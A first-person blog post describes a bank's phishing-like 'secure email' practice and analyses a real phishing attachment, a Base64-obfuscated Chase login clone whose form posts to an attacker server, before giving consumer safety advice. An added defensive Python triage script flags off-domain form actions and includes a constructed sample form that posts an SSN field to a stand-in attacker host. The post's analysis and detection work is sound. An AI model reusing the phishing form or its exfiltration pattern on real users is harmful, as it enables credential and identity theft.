The first time I received a “secure” email message from my bank, I was a bit suspicious of what I was actually seeing. It looked too much like a phishing attempt for my comfort. The message in my inbox was from my banker’s email address, not from Chase [1] directly. It also included an attached HTML page and instructions to “open the attached page in a browser for instructions on how to proceed.”
This immediately raised some red flags for me.
First of all, email itself is inherently insecure. Yet here was my bank allegedly sending me a “secure” message with an attachment. This looked like a textbook phishing attack, so I picked up the phone and called my banker directly.
“No, it’s legitimate. I need you to print out and sign some documents.”
I pointed out how troubling this email really was and even referenced Chase’s own “how to spot a suspicious email” documentation:
Such emails might also ask you to look at an attachment or click a link and then give your personal information on a Web page or in a form. Or the sender’s email address might look suspicious. [2]
“I understand, it’s confusing. But really, I did just send this request. I can resend it if you’d like.”
The resent email looked exactly the same, but as I had my banker on the phone at the time I followed through and opened the attachment. It had links to “Click to Read Message” that legitimately took me to Chase’s secure email portal. But the entire workflow felt off and I voiced my concern to my banker, his supervisor, and to Chase customer support.
It’s impossible to train consumers on appropriate security behavior when the real ways of interacting with a bank so closely resemble phishing attacks.
Recently, I received a phishing email that looked mysteriously similar to the legitimate one above. It came from firstname.lastname@example.org, which is obviously phoney, but would be easy to miss. The email itself claimed that there was increased error activity on my account and, like the real email above, prompted me to open an attached HTML file in a browser to continue.
Thankfully, I know better than that.
I instead downloaded the HTML file to disk and pulled it up in a code inspection window. Instead of a raw HTML file, I was greeted with a script executing:
The page dumps a massive Base64-encoded blob into the address bar. Decoding the obfuscated script directly does yield real HTML, but with a couple of … unexpected additions.
The code itself includes Chase’s actual scripts, images, and even links to legitimate “Report Abuse” pages, just like a normal Chase login page. However, it also includes yet another obfuscated script that adds a custom form action to the login page:
Once de-obfuscated, it’s apparent that this is the markup for a real Chase login page, with the action attribute of the submission form redirected to an attacker’s server.
```html
<form action="http://191..." class="button" method="post" name="submit" id="submit">
```
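A defender-side triage script for attachments like this one, added here as an example and not part of the original post: it peels Base64 layers out of an HTML file offline, then lists every form action whose host is not one of the bank’s own. The trusted-host set, the sample attachment, and the attacker hostname are all constructed for the example.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts a Chase login form may legitimately post to (assumption for this example).
TRUSTED_HOSTS = {"chase.com", "www.chase.com", "secure.chase.com"}

BASE64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
FORM_ACTION_RE = re.compile(r'<form\b[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)', re.I)


def decode_base64_blobs(text, max_depth=3):
    """Return the text plus every decodable Base64 layer found inside it."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):
        found = []
        for layer in frontier:
            for blob in BASE64_RE.findall(layer):
                try:
                    found.append(base64.b64decode(blob, validate=True).decode("utf-8"))
                except (ValueError, UnicodeDecodeError):
                    continue  # not a text payload; skip
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def host_is_trusted(url):
    host = (urlparse(url).hostname or "").lower()
    return host in TRUSTED_HOSTS or any(host.endswith("." + h) for h in TRUSTED_HOSTS)


def suspicious_form_actions(html):
    """Form actions, in the page or any decoded layer, that post off-brand."""
    actions = []
    for layer in decode_base64_blobs(html):
        actions.extend(FORM_ACTION_RE.findall(layer))
    return sorted({a for a in actions if not host_is_trusted(a)})


# Constructed sample: a script that pushes a Base64 data: URL into the address
# bar, hiding a form that posts to a server outside the bank's domain.
_inner = ('<form action="https://collector.attacker.example/post" method="post">'
          '<input name="ssn"></form>'
          '<form action="https://secure.chase.com/login" method="post"></form>')
SAMPLE_ATTACHMENT = ('<html><script>location="data:text/html;base64,'
                     + base64.b64encode(_inner.encode()).decode() + '"</script></html>')

if __name__ == "__main__":
    print(suspicious_form_actions(SAMPLE_ATTACHMENT))
```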
If an unwary user were to actually open this page in their browser, they would see a Chase-branded page asking for them to confirm:
- Account login information
- Contact information
- Card information
- Routing and account number information
- Even their SSN, driver’s license, mother’s maiden name, and DoB
All of this data is submitted not to Chase, but to the attacker’s own server! The attacker’s server, after successfully phishing the data, redirects to Chase’s online login page, so it looks like nothing at all is going on. It’s a horrible attack on users who have been, unfortunately, trained by Chase to trust the validity of attachments asking for authentication information.
Unless Chase commits to never asking customers to log in via HTML pages emailed directly from staff, protecting average users from phishing will be incredibly difficult. There are few, if any, broad steps the community at large can take. However, there are several things you can do to ensure you never fall into a trap like this yourself.
First and foremost, never open webpages attached to emails, even if you know the person who sent them and trust that everything is OK.
Never give up your account information to an online page someone else has asked you to fill out. Unless you’ve requested the form yourself or initiated the submission, always assume that an illegitimate attacker is on the other side of the site.
If anyone from your bank ever contacts you asking for information, refuse to comply. Never give out your data in response to a request. If they really do need your information, tell them you’ll submit it through proper, direct channels instead. Go to https://chase.com and log in to the real Secure Email center and draft your own message conveying the data. Don’t ever click a link provided by someone else – not even me – to get there. Literally type the address in your browser and go there directly.
This extends to phone calls. Never provide your information to anyone over the phone unless you initiated the phone call. If Chase (or anyone) calls you asking for data, hang up and instead call the number on the back of your debit card or on your account statement. It’s next to impossible to trust that a stranger calling (or emailing) you is really who they say they are.
Finally, report every violation you see. [3] Every time you get a bogus email or phone call from someone trying to steal information, report it. Every time you get a legitimate email or phone call from someone asking for your information, report it too. Institutions with whom we trust our personal data should know better than to imitate identity thieves when they communicate. Unfortunately, it’s up to us to keep them honest.
[1] My banker uses an @chase.com address, but it was still troubling to receive a “please open the attached file and click the links to log in” from an address not directly tied to Chase’s secure email center.
[2] https://www.chase.com/digital/resources/privacy-security/security/suspicious-emails
[3] I reported both the legitimate emails and all of the phishing attempts I’ve received to Chase. To date, this is several dozen reports over two years with zero follow-through. Reports usually receive a “Thank you” and a later “You’re right, we didn’t send this” from customer support. The thanks feels good, but this does nothing to protect less tech-savvy customers from being targeted and exploited.